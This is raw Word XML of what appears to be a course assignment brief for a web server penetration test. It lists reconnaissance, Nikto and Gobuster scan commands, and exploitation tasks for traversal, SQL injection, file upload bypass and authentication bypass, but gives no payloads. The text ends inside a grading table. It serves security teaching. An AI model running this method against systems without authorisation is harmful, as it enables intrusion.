    <w:p w14:paraId="6B7A840C" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Hosting provider and registrar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5628B8B1" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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DNS records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734253B6" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Historical data (Netcraft)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52925F28" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Technology Identification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54596D0D" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Web server software and version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B97EAB" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Application framework and version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383D0BA9" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Programming languages used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F52C50" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Plugins/modules installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B1AB58" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Database system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B06FDE1" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Client-side technologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264648FA"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Deliverable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1-2 pages with screenshots of Netcraft, WhatWeb, and curl header analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716A670C"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Part B: Vulnerability Assessment (40%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A003B76"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Required Scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F5DA56" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Nikto Scan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C5DF20" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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nikto -h [target] -o nikto_report.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290D85D9" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Document findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D4AAA8" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Categorize by severity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A393D3" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Explain impact of each vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496AC03F" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Directory Brute-forcing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5E0C60" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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9219C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>gobuster dir -u http://[target]/ -w /usr/share/wordlists/dirb/common.txt -x php,html -o gobuster_results.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760D9065" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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List discovered directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01696483" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Identify sensitive/dangerous paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4341A5C5" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Attempt to access them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4881488A" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Burp Suite Scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C8B080" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Perform active scan (if authorized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0827D43A" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Document identified issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B05719C" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Include screenshots of scan results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE464E3" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Verify false positives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FF0BA4" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Manual Testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416E6EBD" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Test for HTTP method support (OPTIONS, PUT, DELETE, TRACE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449B3289" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Check for path traversal vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EE7E80" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Verify directory listing enabled/disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2877A7FA" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Test SSL/TLS configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1173F37F"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Deliverable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3-5 pages with vulnerability listing, severity ratings, and screenshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2851022A"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Part C: Exploitation &amp; Proof-of-Concept (25%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CCD37C"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Select minimum 2 vulnerabilities to demonstrate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADA07CD"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Option 1: Directory Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596A0F73" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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lastRenderedPageBreak/>
        <w:t>Show vulnerable parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DF8FA9" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Demonstrate file access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F971AEA" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Explain impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F058A8"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Option 2: SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5985C9BF" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Identify vulnerable parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C997E60" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Craft injection payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27921F7D" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Show successful exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCEC691" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Demonstrate data extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A47F72"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Option 3: File Upload Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB9F8ED" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Upload malicious file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8F84FE" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Demonstrate execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EE0FDE" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Show command output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE37A69"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Option 4: Authentication Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DBE1EA" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Test for default credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6276AAB1" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Attempt HTTP method bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7F3C96" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Show unauthorized access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1544431A"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Deliverable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2-3 pages with step-by-step exploitation instructions, command outputs, and screenshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CEF29E"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Part D: Remediation &amp; Recommendations (15%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3E7DBF"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For each vulnerability found, provide:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046B0D63" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Root Cause Analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ED5254" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Why does the vulnerability exist?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407C1F4E" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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What code/configuration is problematic?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C9D56A" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Remediation Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0D3ACA" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Specific code changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C955E2D" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Configuration modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694ADBDB" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Server-level hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E155E5" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Prevention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA91D44" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Secure coding practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D482E8" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Security controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AEE9E1" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Testing methodologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4F3049" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Risk Assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FC284E" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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CVSS score (if applicable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A2EC42" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Business impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4E9B76" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Exploitability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAEBE87"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Deliverable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2-3 pages with remediation advice and examples.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D037E2"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Part E: Final Report Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC8FE0"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lastRenderedPageBreak/>
        <w:t>Minimum 10-12 pages total:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2855BE" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Executive Summary</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1 page)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556E6444"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Target overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0709637E"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Critical findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3A83A3"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Recommended actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D8B3CB" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Reconnaissance</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Part A findings)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157659B3"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Technology stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785BF1AE"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Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A538F40" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Vulnerability Assessment</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Part B findings)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AB91F1"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Comprehensive vulnerability list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0AC8F5"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Severity breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CC22F7"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Tool output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D662DE7" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Exploitation Results</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Part C findings)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FBDE65"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Proof-of-concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608F9C9C"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Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0077F74D"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Command outputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1556E44C" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Remediation Plan</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Part D findings)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180E83D"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Prioritized fix list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095A4D15"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Implementation guidance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684BE369" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Appendices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4260299B"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Tool output logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E28FFD0"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Screenshot compilation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EACCF8" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC60A0E"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Submission Guidelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177C8B43"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File Format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF74A74" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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PDF report (preferred)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF0180F" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Or Word document (.docx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D7E212" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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xml:space="preserve">File naming: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>[YourName]_Week8_WebServerAssessment.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6208B8A9"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Required Inclusions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A1095C" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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At least 10 screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F0B95B" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Minimum 10 pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5503B4F8" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Proper citations (OWASP, CWE, CVE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4270EE" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Professional formatting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F2FDFA" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Table of contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52063D68" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Page numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546E9399"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Professional Standards:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3121461A" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Clear, concise language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648B0E0A" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Proper grammar and spelling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A6711F" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Tables for vulnerability summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4E83C9" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Code snippets formatted clearly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68228178" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Evidence of hands-on testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECDD56D"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lastRenderedPageBreak/>
        <w:t>Grading Rubric (100 points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701"/>
        <w:gridCol w:w="4488"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D9219C" w:rsidRPr="00D9219C" w14:paraId="7DD685A3" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0981819B" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D9219C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4855C3F7" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D9219C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Points</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D4BBE76" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D9219C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-GB"/>
